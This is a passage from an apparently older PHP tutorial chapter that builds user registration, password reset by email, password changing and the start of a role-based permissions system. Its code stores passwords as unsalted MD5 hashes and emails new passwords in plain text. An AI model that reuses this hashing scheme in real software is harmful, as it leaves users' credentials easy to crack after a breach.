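        // The base class comes last; listed first, it would also
        // catch both subclasses
        return 'signup_error';
    }
}

$keys = array(
    messageKeyFor(new SignUpEmailException('mail failed')),
    messageKeyFor(new SignUpNotUniqueException('duplicate')),
    messageKeyFor(new SignUpException('other')),
);
```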

If the form hasn’t been submitted yet, it’ll need to be shown to the user; we set
$display to include the form HTML source:

                                                                         signup.php (excerpt)

               else
               {
                 // If not submitted, display the form
                 $display = array(
                     'title' => 'New Registration',
                     'content' => $form->toHtml()
                 );
               }
           }
       }



      We’ve reached the end of the first try block, so we need to catch any remaining
      exception that may be thrown. If an exception is caught here, it won’t be one of our
      custom exceptions. Therefore, we need to make sure that the exception details are
      logged using the error_log function, and that the web page displays an appropriate
      message to inform the user that registration cannot be completed:

                                                                         signup.php (excerpt)

       catch (Exception $e)
       {
         error_log('Error in '.$e->getFile().
             ' Line: '.$e->getLine().
             ' Error: '.$e->getMessage()
         );
         $display = $reg_messages['signup_error'];
       }
       ?>



      Now, the only task left to do is to produce the HTML source for the web page. Our
      $display variable has been set to an array containing two elements: one for
      the page title and one for the page contents. Depending on the outcome, the contents
      will be the registration form, a confirmation message, or an error message if
      something has gone wrong. These values are inserted into the source code where appropriate:

                                                                        signup.php (excerpt)

 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
     ⋮ HTML Head contents…
   </head>
   <body>
     <h1><?php echo $display['title']; ?></h1>
     <?php echo $display['content']; ?>
   </body>
 </html>
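
In the template above, both elements of $display are echoed as-is, which works because the script builds them itself. If a page title could ever contain user-supplied text, escaping it would be a sensible precaution. The following is a minimal sketch of that idea; the renderDisplay function is a hypothetical helper and is not used by signup.php.

```php
<?php
// Hypothetical helper that renders the $display array as an HTML fragment
function renderDisplay(array $display)
{
    // The title is plain text, so escape it; the content is HTML
    // assembled by the script itself and is passed through unchanged
    return '<h1>' .
        htmlspecialchars($display['title'], ENT_QUOTES, 'UTF-8') .
        "</h1>\n" . $display['content'];
}

$html = renderDisplay(array(
    'title' => 'Tom & Jerry <Registration>',
    'content' => '<p>Thank you.</p>'
));
```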



The finished registration form should look like the one shown in Figure 10.3.




                          Figure 10.3. The finished registration form


And there we have it—a simple but fully functioning user registration system with
email confirmation facility!


      Discussion
      So that you don’t grow bored, I’ve left a couple of pieces of the jigsaw puzzle for
      you to fill in yourself. If a registered user exists who has the same username or email
      address as the one entered by the new registrant, the createSignup method throws
      an exception and the procedure is halted. If you’re happy using HTML_QuickForm,
      you might want to split this check into a separate method that HTML_QuickForm can
      apply as a validation rule for each field in the form. This approach should reduce
      frustration when users find that the account name they chose already exists:
      HTML_QuickForm will generate a message to inform them of this fact, preserve
      the rest of the values they entered, and allow them to try again with a different
      username.
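
As a starting point for that exercise, the availability check could be isolated in a small function like the one sketched here. The isLoginAvailable name and the in-memory SQLite database are assumptions made so the example runs on its own; the table and column names follow the user table used in this chapter.

```php
<?php
// Hypothetical check that could back a per-field validation rule
function isLoginAvailable(PDO $db, $login)
{
    $stmt = $db->prepare('SELECT COUNT(*) FROM user WHERE login = :login');
    $stmt->execute(array(':login' => $login));
    return (int) $stmt->fetchColumn() === 0;
}

// Demonstration against an in-memory SQLite database (assumes pdo_sqlite)
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE user (user_id INTEGER PRIMARY KEY, login TEXT UNIQUE)');
$db->exec("INSERT INTO user (login) VALUES ('harryf')");

$taken = isLoginAvailable($db, 'harryf');
$free = isLoginAvailable($db, 'newuser');
```

A wrapper that takes the submitted field value could then be registered as a validation rule in the same way as cmpPass. Two visitors can still submit the same name at the same moment, so the unique key on the table remains the final safeguard.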

      If you plan to let users change their email addresses once their accounts are created,
      you’ll also need to confirm the new addresses before you store them in the user
      table. You should be able to reuse the methods provided by the SignUp class for
      this purpose. You might even consider reusing the signup table to handle this task.
      Some modifications will be required—you’ll want the confirm method to be able
      to update an existing record in the user table, for example. Be very careful that you
      don’t create a hole in your security, though. If you’re not checking for existing records
      in the user table, a user could sign up for a new account with details that match an
      existing row in the user table. You’ll then end up changing the email address of an
      existing user to that of a new user, which will cause you some embarrassment, at
      the very least.


      How do I deal with members
      who forget their passwords?
      Unfortunately, humans have a tendency to forget important information such as
      passwords, so a feature that allows users to retrieve forgotten passwords is an
      essential time saver. Overlook this necessity, and you can expect to waste a lot of time
      manually changing passwords for people who have forgotten them.

      If you store the passwords in your database only as one-way hashes, you can’t recover
      the originals, so you’ll need a mechanism to generate a new password that, preferably,
      is easy to remember.


       Be Careful with Password Hints
      A common tactic used in web site registration is to use simple questions as memory
      joggers should users forget their password. These questions can include “Where
      were you born?” and “What’s your pet’s name?” Yet details like this may well be
      common knowledge or easy for other users to guess.


Solution
Since we already have a valid email address for each account, as confirmed through
our signup procedure in “How do I build a registration system?”, we just need to
send the new password to that address. Our solution uses the user table from the
previous sections:

                                                                 access_control.sql (excerpt)

 CREATE TABLE user (
   user_id     INT(11)      NOT NULL AUTO_INCREMENT,
   login       VARCHAR(50) NOT NULL DEFAULT '',
   password    VARCHAR(50) NOT NULL DEFAULT '',
   email       VARCHAR(50) DEFAULT NULL,
   firstName   VARCHAR(50) DEFAULT NULL,
   lastName    VARCHAR(50) DEFAULT NULL,
   signature   TEXT         NOT NULL,
   PRIMARY KEY (user_id),
   UNIQUE KEY user_login (login)
 );



The AccountMaintenance Class
The AccountMaintenance class is a utility class that, among other things, will reset
the password for a user’s account and generate an email to send the user the new
password. Our class uses the following configuration settings:

                                                                 access_control.ini (excerpt)

 ; Access Control Settings

 ;web form variables e.g. $_POST['login']
 [login_vars]
 login=login

 ;user login table details
 [users_table]
 table=user
 col_id=user_id
 col_login=login
 col_password=password
 col_email=email
 col_name_first=firstName
 col_name_last=lastName




      To provide a consistent level of error handling, we define some custom exception
      classes:

                                                     AccountMaintenance.class.php (excerpt)

       class AccountException extends Exception
       {
         public function __construct($message = null, $code = 0)
         {
           parent::__construct($message, $code);
           error_log('Error in '.$this->getFile().
             ' Line: '.$this->getLine().
             ' Error: '.$this->getMessage()
           );
         }
       }
       class AccountDatabaseException extends AccountException {}
       class AccountUnknownException extends AccountException {}
       class AccountPasswordException extends AccountException {}
       class AccountPasswordResetException extends AccountException {}



      Our base class, AccountException, is a custom exception that ensures the exception
      details are logged using the error_log function. The subclasses represent different
      exception situations that might arise during account maintenance.

      We begin our AccountMaintenance class definition with the class properties:

                                                AccountMaintenance.class.php (excerpt)

 class AccountMaintenance
 {
   protected $db;
   protected $cfg;
   private $words;



$db will contain a PDO instance for our database connection, $cfg will store our
configuration details, and $words will store the array of words that’s
used in password generation.

The constructor simply stores the database object for future use by the class and
loads the configuration file:

                                                AccountMaintenance.class.php (excerpt)

   public function __construct(PDO $db)
   {
     $this->db = $db;
     $this->cfg = parse_ini_file('access_control.ini', TRUE);
   }



Since we save the user’s password in the database as an MD5 hash (a one-way
function, not reversible encryption), we can no longer find out what the original password was. If
members forget their passwords in such cases, you’ll have to make new ones for
them. You could simply generate a random string of characters, but it’s important
to remember that if you make your security systems too unfriendly, you’ll put off
legitimate users. The resetPassword method generates a more human-friendly
randomized password:

                                                AccountMaintenance.class.php (excerpt)

   function resetPassword($login, $email)
   {
     //Put the cfg vars into local vars for readability
     $user_table = $this->cfg['users_table']['table'];
     $user_id = $this->cfg['users_table']['col_id'];
     $user_login = $this->cfg['users_table']['col_login'];
     $user_pass = $this->cfg['users_table']['col_password'];
     $user_email = $this->cfg['users_table']['col_email'];
     $user_first = $this->cfg['users_table']['col_name_first'];
     $user_last = $this->cfg['users_table']['col_name_last'];
     $user_sig = $this->cfg['users_table']['col_signature'];

     try
     {
       $sql = "SELECT " . $user_id . ",
           " . $user_login . ", " . $user_pass . ",
           " . $user_first . ", " . $user_last . "
           FROM
           " . $user_table . "
           WHERE
           " . $user_login . "=:login
           AND
           " . $user_email . "=:email";
       $stmt = $this->db->prepare($sql);
       $stmt->bindParam(':login', $login);
       $stmt->bindParam(':email', $email);
       $stmt->execute();
       $row = $stmt->fetchAll(PDO::FETCH_ASSOC);
     }
     catch (PDOException $e)
     {
       throw new AccountDatabaseException('Database error when' .
           ' finding user: '.$e->getMessage());
     }




      The method first assigns the configuration settings to local variables to make the
      code a little more readable. Then, given a combination of a username and an email
      address, it attempts to identify the corresponding row in the user table.

      We use both the username and email to identify the row, so it’s a little more difficult
      for other people to reset your members’ passwords. Although there’s no risk of
      individuals stealing the new password (unless they have control over a member’s
      email account), it will certainly irritate people if their passwords are continually
      being reset. Requiring both the username and email address of the user makes the
      process a little more complex.

      If we can’t find a single matching row, we throw an exception:

                                                AccountMaintenance.class.php (excerpt)

      if (count($row) != 1)
      {
        throw new AccountUnknownException('Could not find account');
      }



Next, we call the generatePassword method (which we’ll discuss in a moment) to
create a new password:

                                                AccountMaintenance.class.php (excerpt)

      try
      {
        $password = $this->generatePassword();



This method call is placed within a try block to catch the exception thrown by
generatePassword if a new password cannot be generated.

resetPassword then updates the user table with the new password (using md5
to hash it), and returns the new password in an array containing the user details:

                                                AccountMaintenance.class.php (excerpt)

        $sql = "UPDATE " . $user_table . "
            SET
            " . $user_pass . "=:pass
            WHERE
            " . $user_id . "=:id";
        $stmt = $this->db->prepare($sql);
        // bindValue is used because bindParam requires a variable reference
        $stmt->bindValue(':pass', md5($password));
        $stmt->bindParam(':id', $row[0][$user_id]);
        $stmt->execute();
      }
      catch (AccountPasswordException $e)
      {
        throw new AccountPasswordResetException('Error when' .
            ' generating password: '.$e->getMessage());
      }
      catch (PDOException $e)
      {
        throw new AccountDatabaseException('Database error when' .
            ' resetting password: '.$e->getMessage());
      }
      $row[0][$user_pass] = $password;
      return $row;
   }




      The addWords method is used to supply the class with an indexed array of words
      with which to build memorable passwords:

                                                       AccountMaintenance.class.php (excerpt)

         function addWords($words)
         {
           $this->words = $words;
         }



      I’ve used a list of over one thousand words, stored in a text file, to build memorable
      passwords. Be aware that if anyone knows the list of words you’re using, cracking
      the new password will be significantly easier, so you should create your own list.

      generatePassword constructs a random password from the
      AccountMaintenance->words array, adding separators that can include any number
      from 0 to 9, or an underscore character:

                                                       AccountMaintenance.class.php (excerpt)

   protected function generatePassword()
   {
     $count = count($this->words);
     if ($count == 0)
     {
       throw new AccountPasswordException('No words to use!');
     }
     // No explicit seeding is needed: PHP seeds its random number
     // generator automatically
     $separators = range(0,9);
     $separators[] = '_';
     $password = array();
     for ($i = 0; $i < 4; $i++) {
       if ($i % 2 == 0) {
         // Even positions: a randomly chosen word
         shuffle($this->words);
         $password[$i] = trim($this->words[0]);
       } else {
         // Odd positions: a randomly chosen separator
         shuffle($separators);
         $password[$i] = $separators[0];
       }
     }
     // Randomize the order of the words and separators
     shuffle($password);
     return implode('', $password);
   }
 }




The password itself will contain two words chosen at random from the list, as well
as two random separators. The order in which these elements appear in the password
is also random. The passwords this system generates might look something like
7correct9computer and 48courtclothes, which follow a format that’s relatively easy
for users to remember.
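
The shuffle function is convenient, but it isn’t designed for security-sensitive randomness. On PHP 7 or later, the same two-words-plus-two-separators scheme could be built on random_int, which draws from a cryptographically secure source. The sketch below is a variation under that assumption, not the class’s own method; generateMemorablePassword is a hypothetical standalone function.

```php
<?php
// Hypothetical variant of generatePassword using random_int (PHP 7+)
function generateMemorablePassword(array $words)
{
    if (count($words) == 0) {
        throw new InvalidArgumentException('No words to use!');
    }
    $words = array_values($words);
    $separators = array_merge(range(0, 9), array('_'));
    $parts = array();
    // Pick two random words and two random separators
    for ($i = 0; $i < 2; $i++) {
        $parts[] = trim($words[random_int(0, count($words) - 1)]);
        $parts[] = $separators[random_int(0, count($separators) - 1)];
    }
    // Fisher-Yates shuffle driven by random_int, so the order of the
    // four parts is random as well
    for ($i = count($parts) - 1; $i > 0; $i--) {
        $j = random_int(0, $i);
        $tmp = $parts[$i];
        $parts[$i] = $parts[$j];
        $parts[$j] = $tmp;
    }
    return implode('', $parts);
}

$password = generateMemorablePassword(
    array('correct', 'computer', 'court', 'clothes')
);
```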

The Reset Password Page
There’s one thing we need to finish our web site’s account maintenance feature: we
need a web form that our users can fill in to request a password change or reset.
First, we include all the packages we need:

                                                               newpass.php (excerpt)

 <?php
 error_reporting(E_ALL);
 require_once 'Session.class.php';
 require_once 'AccountMaintenance.class.php';
 require_once 'HTML/QuickForm.php';
 require_once 'Mail.php';
 require_once 'Mail/mime.php';
 require_once 'dbcred.php';



As before, we set the error reporting level to E_ALL with the error_reporting function,
since the PEAR packages we’re using raise E_STRICT errors under PHP 5.

Of course, we need to include our AccountMaintenance class file. We’ll also be using
the PEAR HTML_QuickForm and Mail_mime packages. The dbcred.php file contains
the database credentials we’ll need to connect to our database.

Next, we create the variables we need:

                                                                   newpass.php (excerpt)

       $reg_messages = array(
           'email_sent' => array(
               'title' => 'Check your email',
               'content' => '<p>Thank you. An email has been sent to:</p>'
           ),
           'email_error' => array(
               'title' => 'Email Problem',
               'content' => '<p>Unable to send your details.<br />' .
               'Please contact the site administrators.</p>'
           ),
           'no_account' => array(
               'title' => 'Account Problem',
               'content' => '<p>We could not find your account.<br />' .
               'Please contact the site administrators.</p>'
           ),
           'reset_error' => array(
               'title' => 'Password Reset Problem',
               'content' => '<p>There was an error resetting your' .
               ' password.<br />Please contact the site administrators.' .
               '</p>'
           )
       );
       $yourEmail = 'you@yourdomain.com';
       $subject = 'Your password';
       $msg = 'Here are your login details. Please change your password.';



      The $reg_messages variable contains an array of page titles and messages that will
      be used in the web page at various stages of the password reset process. $yourEmail,
      $subject, and $msg are used in the creation of the email notification.

      Next, we build our form with PEAR::HTML_QuickForm:

                                                                   newpass.php (excerpt)

       try
       {
         // Instantiate the QuickForm class
         $form = new HTML_QuickForm('passwordForm', 'POST');

         // Add a header to the form
         $form->addElement('header', 'MyHeader',
            'Forgotten Your Password?');

         // Add a field for the email address
         $form->addElement('text', 'email', 'Enter your email address');
         $form->addRule('email', 'Enter your email', 'required', FALSE,
             'client');
         $form->addRule('email', 'Enter a valid email address', 'email',
             FALSE, 'client');

         // Add a field for the login
         $form->addElement('text', 'login', 'Enter your login name');
         $form->addRule('login', 'Enter your login', 'required', FALSE,
             'client');

         // Add a submit button called submit with label "Get Password"
         $form->addElement('submit', 'submit', 'Get Password');




Notice also that we’re opening a try block: we want to catch any exceptions that
may be thrown from the execution of the rest of the code. This precaution will allow
us to display an appropriate message on the web page instead of a PHP error.

If the form has been submitted, we can begin the password changing process:

                                                               newpass.php (excerpt)

   if ($form->validate())
   {
     $db = new PDO($dsn, $user, $password);
     $db->setAttribute(PDO::ATTR_ERRMODE,
         PDO::ERRMODE_EXCEPTION);
     $aMaint = new AccountMaintenance($db);
     $rawWords = file('words.txt');
     $word = array_map('trim', $rawWords);
     $aMaint->addWords($word);



We instantiate the PDO and AccountMaintenance classes and load our words file (I
also trimmed off any whitespace that may appear before or after each word—just
in case) so we can pass it to the addWords method.
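
As a minimal sketch of the word-loading step, the snippet below writes a small stand-in word list to a temporary file and reads it back. The loadWords helper and the sample words are assumptions made for illustration; they aren’t part of newpass.php. The sketch asks file() to strip line endings, trims each entry, and also drops blank lines, which the excerpt above doesn’t do:

```php
<?php
// Hypothetical helper: read a word list with one word per line.
function loadWords($path)
{
    // FILE_IGNORE_NEW_LINES strips the trailing newline from each line.
    $lines = file($path, FILE_IGNORE_NEW_LINES);
    if ($lines === false) {
        throw new RuntimeException('Could not read word list: ' . $path);
    }
    // Remove stray spaces, tabs, and carriage returns around each word.
    $words = array_map('trim', $lines);
    // Drop entries that were empty or contained only whitespace.
    return array_values(array_filter($words, 'strlen'));
}

// Stand-in data for words.txt (assumed content).
$path = tempnam(sys_get_temp_dir(), 'words');
file_put_contents($path, "  apple \nbanana\r\n\n cherry\t\n");
$words = loadWords($path);
unlink($path);

print_r($words);
```

Filtering out blank entries is a design choice: it keeps an accidental empty line in the file from becoming an empty "word" in a generated password.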

Next, we call the resetPassword method, passing the login and email values from
the form as arguments:

                                                                     newpass.php (excerpt)

             $details = $aMaint->resetPassword(
                 $form->getSubmitValue('login'),
                 $form->getSubmitValue('email'));



      If all goes well, an email is sent via PEAR::Mail_Mime to inform the user of the new
      password:

                                                                     newpass.php (excerpt)

             $crlf = "\n";
             $text = $msg . "\n\nLogin: " . $details[0]['login'] .
                 "\nPassword: " . $details[0]['password'];

             $hdrs = array(
                 'From'        => $yourEmail,
                 'Subject'     => $subject
             );

             $mime = new Mail_mime($crlf);
             $mime->setTXTBody($text);
             $body = $mime->get();
             $hdrs = $mime->headers($hdrs);
             $mail = Mail::factory('mail');
             // Send the message
             $succ = $mail->send($form->getSubmitValue('email'), $hdrs,
                 $body);
             if (PEAR::isError($succ))
             {
               $display = $reg_messages['email_error'];
             }
             else
             {
               $display = $reg_messages['email_sent'];
               $display['content'] .= '<p>' .
                   htmlspecialchars($form->getSubmitValue('email')) . '</p>';
             }
         }



      The $display variable is set to a confirmation message when the email is sent
      successfully; otherwise, it’s set to an error message.

If the form hasn’t yet been submitted, we just display the form HTML:

                                                             newpass.php (excerpt)

     else
     {
       $display = array(
           'title' => 'Reset Password',
           'content' => $form->toHtml()
       );
     }
 }



Finally, we catch any exceptions that may have occurred and display an appropriate
message:

                                                             newpass.php (excerpt)

 catch (AccountUnknownException $e)
 {
   $display = $reg_messages['no_account'];
 }
 catch (Exception $e)
 {
   error_log('Error in '.$e->getFile().
       ' Line: '.$e->getLine().
       ' Error: '.$e->getMessage()
   );
   $display = $reg_messages['reset_error'];
 }
 ?>



The HTML of the Reset Password page looks like this:

                                                             newpass.php (excerpt)

 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
     ⋮ HTML Head contents…
   </head>
   <body>
     <h1><?php echo $display['title']; ?></h1>
     <?php echo $display['content']; ?>
   </body>
 </html>




      Figure 10.4 shows the page’s display.




                                   Figure 10.4. The Reset Password page


      You can add a link to the bottom of your login form so that the user is able to access
      the Reset Password page. Here’s an example:

       <a href="newpass.php">Forgotten your password?</a>




      How do I let users change their passwords?
      A good design test for many PHP applications is whether users can change their
      passwords without needing to log back into the application afterwards. Provided
      you construct your application carefully, your users should be able to go about their
      business without further ado after changing their passwords. It’s important to be
      considerate to your site’s users if you want them to stick around!


Solution
If we return for a minute to the session-based authentication mechanism we discussed
earlier in this chapter, you’ll remember that the login and MD5-hashed
password are stored in session variables and rechecked on every new page by the
Auth class. The trick is to change the value of the password in both the session
variable and the database when users change their passwords. We can perform this
trick with a small modification to the AccountMaintenance class (found in “How
do I deal with members who forget their passwords?”) and the addition of a new
form.

Modifying AccountMaintenance
With a little tweaking of the AccountMaintenance class to add a method for changing
passwords, we should be able to handle the job fairly easily. The changePassword
method requires an instance of the Auth class (found in “How do I create a class to
control access to a section of the site?”), the old password, and the new password
as arguments:

                                                AccountMaintenance.class.php (excerpt)

   public function changePassword($auth, $oldPassword, $newPassword)
   {
     $var_login = $this->cfg['login_vars']['login'];
     $user_table = $this->cfg['users_table']['table'];
     $user_login = $this->cfg['users_table']['col_login'];
     $user_pass = $this->cfg['users_table']['col_password'];



At the beginning of the method, we store some of the configuration settings in local
variables to help the readability of the rest of the method.

The method then instantiates a new Session object (which we saw in “How do I
create a session class?”) and attempts to find the user record in the database:

                                                AccountMaintenance.class.php (excerpt)

      $session = new Session();
      try
      {
        $sql = "SELECT *
            FROM " . $user_table . "


            WHERE
            " . $user_login . " = :login
            AND
            " . $user_pass . " = :pass";
        $stmt = $this->db->prepare($sql);
        // bindValue() accepts expressions; bindParam() needs a variable
        $stmt->bindValue(':login', $session->get($var_login));
        $stmt->bindValue(':pass', md5($oldPassword));
        $stmt->execute();
        $result = $stmt->fetchAll(PDO::FETCH_ASSOC);
      }
      catch (PDOException $e)
      {
        throw new AccountDatabaseException('Database error when' .
            ' finding user: '.$e->getMessage());
      }




      The method first performs a database lookup to find the record of the user who’s
      using the current login details—obtained from the session information—and the
      old password. If a PDOException is thrown, the method throws one of our custom
      exceptions, AccountDatabaseException.

      The results of the database lookup are checked—if anything but a single matching
      record is returned, the method will throw an AccountUnknownException:

                                                    AccountMaintenance.class.php (excerpt)

           if (count($result) != 1)
           {
             throw new AccountUnknownException('Could not find account');
           }



      Finally, if no exceptions have been thrown, the method updates the password
      information in the database with the new password:

                                                    AccountMaintenance.class.php (excerpt)

           try
           {
             $sql = "UPDATE " . $user_table . "
                 SET
                 " . $user_pass . " = :pass


                 WHERE
                 " . $user_login . " = :login";
             $stmt = $this->db->prepare($sql);
             // bindValue() accepts expressions; bindParam() needs a variable
             $stmt->bindValue(':login', $session->get($var_login));
             $stmt->bindValue(':pass', md5($newPassword));
             $stmt->execute();
             $auth->storeAuth($session->get($var_login),
               $newPassword);
           }
           catch (PDOException $e)
           {
             throw new AccountDatabaseException('Database error when' .
                 ' updating password: '.$e->getMessage());
           }
         }




After we update the information in the user table, the current session information
is also updated via the Auth->storeAuth method. Again, if the operation throws a
PDOException, we throw an AccountDatabaseException.

It’s a good idea to ask users to enter their old password before changing it and
giving them access with a new one. Perhaps the user logged in at an Internet café
and then left, forgetting to log out, or worse, the session was hijacked electronically.
Requiring the old password limits the potential for damage, as it prevents anyone
who “takes over” the session from changing the password and thus assuming total
control. Instead, the intruder is logged in only for as long as the session continues.
(You may also wish to ask a user to reenter the password before completing any
major action, such as making a credit card purchase, for this very reason.)
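
The effect of demanding the old password can be sketched without a database. In the snippet below, an in-memory array stands in for the user table, and the changeStoredPassword function is a hypothetical helper rather than the changePassword method itself; it mirrors the MD5 comparison used in this chapter only to stay consistent with the surrounding code:

```php
<?php
// Hypothetical stand-in for the user table: login => MD5 hash.
$users = array('jackblack' => md5('password'));

// Updates the stored hash only when the supplied old password matches.
function changeStoredPassword(array &$users, $login, $oldPassword, $newPassword)
{
    if (!isset($users[$login]) || $users[$login] !== md5($oldPassword)) {
        return false; // unknown account or wrong current password
    }
    $users[$login] = md5($newPassword);
    return true;
}

// Someone who has taken over the session but can't supply the
// current password is refused...
$hijackAttempt = changeStoredPassword($users, 'jackblack', 'guess', 'owned');
// ...while the real user succeeds.
$realChange = changeStoredPassword($users, 'jackblack', 'password', 'newsecret');

var_dump($hijackAttempt, $realChange);
```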

The Change Password Form
This web page form will show you how the changePassword method can easily be
used in your registration system. We start by including all the classes and other
files we’ll need:

                                                              changepass.php (excerpt)

 <?php
 error_reporting(E_ALL);
 require_once 'Session.class.php';


 require_once 'Auth.class.php';
 require_once 'AccountMaintenance.class.php';
 require_once 'HTML/QuickForm.php';
 require_once 'dbcred.php';




      We set the error reporting level to E_ALL with the error_reporting function, as
      we’re using PEAR packages, which will cause E_STRICT errors under PHP 5. We
      then include our custom classes for session, authorization, and account management,
      the PEAR::HTML_QuickForm package, and our database credentials file.

      Next, we set the $reg_messages array to hold the page content for the different form
      outcomes:

                                                                  changepass.php (excerpt)

       $reg_messages = array(
           'success' => array(
               'title' => 'Password Changed',
               'content' => '<p>Your password has been changed' .
                   ' successfully.</p>'
           ),
           'no_account' => array(
               'title' => 'Account Problem',
               'content' => '<p>We could not find your account.<br />' .
               'Please contact the site administrators.</p>'
           ),
           'change_error' => array(
               'title' => 'Change Password Problem',
               'content' => '<p>There was an error changing your' .
               ' password. Please contact the site administrators,' .
               ' or click ' .
               '<a href="' . $_SERVER['PHP_SELF'] . '">here</a> to' .
               ' try again.</p>'
           )
       );



      We then test to find out whether the user is currently authorized to see the Change
      Password form, with the assistance of the Auth class:

                                                              changepass.php (excerpt)

 try
 {
   $db = new PDO($dsn, $user, $password);
   $db->setAttribute(PDO::ATTR_ERRMODE,
       PDO::ERRMODE_EXCEPTION);
   $auth = new Auth($db, 'login.php', 'secret');



At this point, we open a try block; we want to catch any exceptions that may be
thrown from the execution of the rest of the code. Catching any exceptions from
this point will allow us to display an appropriate message on the web page instead
of a PHP error.

We instantiate the PDO and Auth classes; if the user isn’t authorized, he or she will
be redirected to the login form. And if all’s well, we start building the Change
Password form with PEAR::HTML_QuickForm:

                                                              changepass.php (excerpt)

   $form = new HTML_QuickForm('changePass', 'POST');

   function cmpPass($element, $confirm)
   {
     $password = $GLOBALS['form']->getElementValue('newPassword');
     return $password == $confirm;
   }
   $form->registerRule('compare', 'function', 'cmpPass');



After instantiating the HTML_QuickForm object, we define and register the function
cmpPass that will be used to validate the password fields, to ensure that the password
and password confirmation fields match.
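
One detail worth considering when comparing the two fields is PHP’s loose == operator, which compares two numeric-looking strings as numbers. The sketch below is independent of HTML_QuickForm; passwordsMatch is a hypothetical helper, shown here only to illustrate how a strict comparison behaves differently:

```php
<?php
// Hypothetical helper: compare the two submitted password fields strictly.
function passwordsMatch($password, $confirm)
{
    // === compares the strings character by character, whereas ==
    // would compare two numeric-looking strings as numbers.
    return is_string($password) && is_string($confirm)
        && $password === $confirm;
}

var_dump('1e3' == '1000');                    // loose comparison
var_dump(passwordsMatch('1e3', '1000'));      // strict comparison
var_dump(passwordsMatch('s3cret', 's3cret'));
```

Because the form accepts alphanumeric passwords, a value such as 1e3 is a legal entry, so a strict comparison is the safer choice for a confirmation check.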

Then we add the form:

                                                              changepass.php (excerpt)

   $form->addElement('header', 'MyHeader', 'Change your password');

   // Add a field for the old password
   $form->addElement('password', 'oldPassword',


       'Current Password');
   $form->addRule('oldPassword', 'Enter your current password',
       'required', false, 'client');

   // Add a field for the new password
   $form->addElement('password', 'newPassword', 'New Password');
   $form->addRule('newPassword', 'Please provide a password',
       'required', false, 'client');
   $form->addRule('newPassword',
       'Password must be at least 6 characters',
       'minlength', 6, 'client');
   // The message now matches the limit the rule actually enforces
   $form->addRule('newPassword',
       'Password cannot be more than 50 characters',
       'maxlength', 50, 'client');
   $form->addRule('newPassword',
       'Password can only contain letters and ' .
       'numbers', 'alphanumeric', NULL, 'client');

   // Add a field for password confirmation
   $form->addElement('password', 'confirm', 'Confirm Password');
   $form->addRule('confirm', 'Please confirm your password',
       'required', false, 'client');
   $form->addRule('confirm', 'Your passwords do not match',
       'compare', false, 'client');

   // Add a submit button
   $form->addElement('submit', 'submit', 'Change Password');




      If the form has been submitted, we can attempt to change the password:

                                                               changepass.php (excerpt)

         if ($form->validate())
         {
           $aMaint = new AccountMaintenance($db);
           $aMaint->changePassword($auth,
               $form->getSubmitValue('oldPassword'),
               $form->getSubmitValue('newPassword')
           );
           $display = $reg_messages['success'];
         }

On validation of the form, we instantiate an AccountMaintenance object and call
the changePassword method. If no exceptions are thrown, we set the $display
variable to the success message.

If the form has not yet been submitted and validated, we display the form contents:

                                                            changepass.php (excerpt)

     else
     {
       // If not submitted, display the form
       $display = array(
           'title' => 'Change Password',
           'content' => $form->toHtml()
       );
     }
 }



The final task of our main script is to catch any possible exceptions and display
appropriate page content:

                                                            changepass.php (excerpt)

 catch (AccountUnknownException $e)
 {
   $display = $reg_messages['no_account'];
 }
 catch (Exception $e)
 {
   error_log('Error in '.$e->getFile().
       ' Line: '.$e->getLine().
       ' Error: '.$e->getMessage()
   );
   $display = $reg_messages['change_error'];
 }
 ?>



The HTML content of the Change Password page is as follows:

                                                                            changepass.php (excerpt)

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
         <head>
           ⋮ HTML Head contents…
         </head>
         <body>
           <h1><?php echo $display['title']; ?></h1>
           <?php echo $display['content']; ?>
         </body>
       </html>



      Finally, the new Change Password page can be seen in Figure 10.5.




                                Figure 10.5. The new Change Password page


      Discussion
      Now that you know how to allow users to change their passwords, it should be no
      problem for you to change other account settings, such as the first and last names
      and the signature—simply add the details to the AccountMaintenance class. If you
      want to allow users to change their email addresses, you’ll need to examine the
      registration procedure used earlier in “How do I build a registration system?”, and
      modify the SignUp class. You should make sure that users confirm a new email
      address before you allow them to change it.


How do I build a permissions system?

In the previous sections, we built an authentication system that provided global
security for your web site. But, consider this: are all the members of your site equal?
You probably don’t want all of your users to have access to edit and delete articles,
for example. To deal with this issue, you need to add to the security system further
functionality that allows you to assign permissions to groups of members, permitting
only these users to perform specific actions.

Rather than assign permissions to single accounts, which would quickly become a
nightmare to administer, we’ll build a permissions system in terms of users, groups,
and permissions. Users (login accounts) will be assigned to groups, which will have
names like Administrators, Authors, Managers, and so on. Permissions reflect actions
that users will be allowed to perform within the site, and they will also be assigned
to groups. From an administration perspective, this system will be easy to manage,
as it’ll be a simple matter to see which permissions a particular group has, and
which users are assigned to that group.

This kind of access control is known as role-based access control. If you’d like to
read more on the theory of role-based access control, the web site of the US Government
National Institute of Standards and Technology has a complete section on
it.11

Solution
Let’s leap in and build our permission system.

Setting Up the Database
Building the permissions system initially requires the construction of many-to-many
relationships between database tables. This is explained as follows:

■ A user can belong to many groups.
■ A group may have many users.
■ A permission can be assigned to many groups.
■ A group may have many permissions.



11
     http://csrc.nist.gov/rbac/

      In practical terms, the way to build many-to-many relationships in MySQL is to use
      a bridge table, which relates to two other tables. The bridge table stores a two-column
      index, each column being the key of one of the two related tables. For example, we
      have a user table and a collection table in our database. Here’s the SQL for those
      tables:

                                                                    access_control.sql (excerpt)

       CREATE TABLE user (
         user_id     INT(11)      NOT NULL AUTO_INCREMENT,
         login       VARCHAR(50) NOT NULL DEFAULT '',
         password    VARCHAR(50) NOT NULL DEFAULT '',
         email       VARCHAR(50) DEFAULT NULL,
         firstName   VARCHAR(50) DEFAULT NULL,
         lastName    VARCHAR(50) DEFAULT NULL,
         signature   TEXT         NOT NULL,
